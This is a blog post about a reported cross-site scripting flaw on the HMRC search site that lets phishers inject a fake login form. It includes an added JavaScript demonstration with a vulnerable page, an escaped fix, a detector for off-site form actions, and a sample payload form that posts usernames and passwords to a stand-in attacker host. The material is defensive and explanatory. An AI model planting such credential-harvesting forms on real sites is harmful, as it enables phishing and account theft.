My thanks to a loyal reader who sent me a link to an article about a potential security flaw within the HMRC website that may allow phishers to harvest personal information from unwary users.
Here is a summary of the issue from Concept Business Systems (who also put together the video above):
A potentially dangerous cross site scripting vulnerability has been discovered on Her Majesty's Customs & Excise web site.
This exploit allows anyone to alter content shown on the HMRC.gov.uk search site.
As we've shown below, it's possible to change any part of the site. If exploited, a fraudster could potentially gain access to user accounts by forwarding a malicious link by email, web forum or chat message. HMRC are a prime target for phishing scams, but success rates are limited for a number of reasons. The main problem fraudsters face is trying to convince their victims that the site (and email) is genuine. Quite often, it's simple grammatical / spelling mistakes which give the game away. Unfortunately, some scams are very well executed and can fool even the most careful users.
All phishing scams are dangerous, but this is no ordinary phishing scam and it stands out for two reasons.
1. It's a very high profile site.
2. The fraudster no longer needs to clone the site, these changes can be made to the genuine site... thus hiding the scam behind the correct URL (www.hmrc.gov.uk) and giving the user a false sense of security.
In the video below, we've altered the content and replaced it with a message asking the user to log in in order to perform a tailored search. This message and the form beneath are fake; created purely to collect your username & password. These details are not sent to HMRC's server and are therefore not covered by their SSL certificate (the padlock symbol). Instead, they are forwarded to an address of the hacker's choice.
With phishing scams & identity theft a real cause for concern, this needs to be resolved as a matter of urgency.
If you suspect you've been a victim of such a scam, it's absolutely vital that you change your password as soon as possible, particularly if you're an agent acting on behalf of other clients.
DO NOT disclose any personal details in your email... simply outline the type of information you disclosed and to whom.
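To make the mechanism in the summary above concrete, here is an added illustration that is not part of the original post and is not Concept Business Systems' code: a toy search results page that echoes the search term unencoded (the reflected cross-site scripting pattern described), the same page with HTML encoding applied, and a simple check that flags any form whose action posts to a host other than the site itself, which is exactly how the bogus login form in the video leaks credentials. The site host, the attacker host and the injected form are all hypothetical and constructed for the example; none of it is taken from the HMRC site.

```javascript
// Added example, not code from the original post or from Concept Business Systems.
// The hostnames and the injected form below are constructed for illustration.

const SITE_HOST = "search.example.gov.uk"; // hypothetical host of the genuine site

// Vulnerable: the search term is echoed straight into the page markup.
// Anything in the query string, including a <form>, is rendered as HTML.
function renderSearchVulnerable(query) {
  return `<h1>Results for: ${query}</h1>` +
         `<form action="/search"><input name="q"></form>`;
}

// Hardened: encode the five HTML-significant characters before the term
// reaches the markup, so it is shown as text rather than parsed as tags.
function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, (c) => ({
    "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;",
  })[c]);
}
function renderSearchFixed(query) {
  return `<h1>Results for: ${escapeHtml(query)}</h1>` +
         `<form action="/search"><input name="q"></form>`;
}

// Constructed payload in the style the summary describes: a "please log in"
// message plus a form whose action points at a hypothetical attacker host.
// A victim would reach this through a link such as /search?q=<payload>.
const FAKE_LOGIN =
  "<p>Please log in to perform a tailored search</p>" +
  '<form action="https://attacker.example/collect" method="post">' +
  '<input name="user"><input name="pass" type="password"></form>';

// Check: return the hosts of every <form action> in the markup that do not
// belong to the site. Relative actions resolve against the site's own origin
// and are therefore not reported; anything else is a credential leak candidate.
function foreignFormActions(html, siteHost) {
  const found = [];
  const formRe = /<form\b[^>]*\baction\s*=\s*["']([^"']*)["']/gi;
  let m;
  while ((m = formRe.exec(html)) !== null) {
    let host;
    try {
      host = new URL(m[1], `https://${siteHost}/`).host;
    } catch {
      host = null; // unparseable action; report the raw value
    }
    if (host !== siteHost) found.push(host ?? m[1]);
  }
  return found;
}

// Stand-alone run: the vulnerable page contains a form posting off-site,
// the hardened page does not.
console.log(foreignFormActions(renderSearchVulnerable(FAKE_LOGIN), SITE_HOST));
console.log(foreignFormActions(renderSearchFixed(FAKE_LOGIN), SITE_HOST));
```

The check is deliberately crude (a regex over markup, not a DOM walk), but it captures the point made in the summary: the padlock and the genuine address say nothing about where a form on the page actually sends its data. The real fix is on the server side, in `renderSearchFixed`, where output encoding stops the injected markup from becoming part of the page at all.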
Tax does have to be taxing.